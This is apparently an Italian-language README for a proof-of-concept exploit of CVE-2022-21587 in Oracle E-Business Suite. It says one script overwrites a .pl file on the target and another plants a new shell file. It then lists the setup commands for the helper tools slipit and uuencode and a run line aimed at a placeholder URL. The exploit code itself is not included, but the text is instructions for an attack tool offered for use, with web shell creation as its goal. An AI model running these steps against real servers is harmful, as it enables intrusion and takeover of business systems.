
Proof-of-concept exploit per CVE-2022-21587 che prende di mira Oracle E-Business Suite con capacità di sovrascrittura di file e creazione di shell.
CVE-2022-21587 POC
file exploit.py sovrascriverà il file .pl (non consigliato per l'uso, influenzerà il sistema)
file EBS non sovrascrive, creerà un nuovo file shell
installa slipit: git clone https://github.com/usdAG/slipit
cd slipit
python3 setup.py sdist
pip3 install --user dist/*
export PATH=/home/yourname/.local/bin:$PATH
installa uuencode: sudo apt-get install sharutils
Exploit: python3 http|https://example.com